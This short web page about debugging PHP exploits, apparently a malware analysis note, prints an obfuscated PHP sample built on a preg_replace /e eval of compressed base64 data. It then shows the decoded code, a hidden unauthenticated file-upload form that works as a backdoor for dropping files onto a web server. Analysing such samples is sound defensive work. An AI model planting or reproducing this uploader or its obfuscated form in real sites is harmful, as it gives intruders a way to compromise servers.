Zum Inhalt

Debugging exploits

Example exploit

Obfuscated code

<?php
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B","");
?>

Deobfuscated code

$a = "base64_encode";$b = "gzdeflate";
            eval(dfjaqw87561("?><?php
if(isset($_POST['Submit'])){
    $filedir = "";
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $abod);

echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
echo'
<div id="feedback_suggestions" style="display:none"><form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form></div>';
}
?>"));


?>

Tools for deobfuscation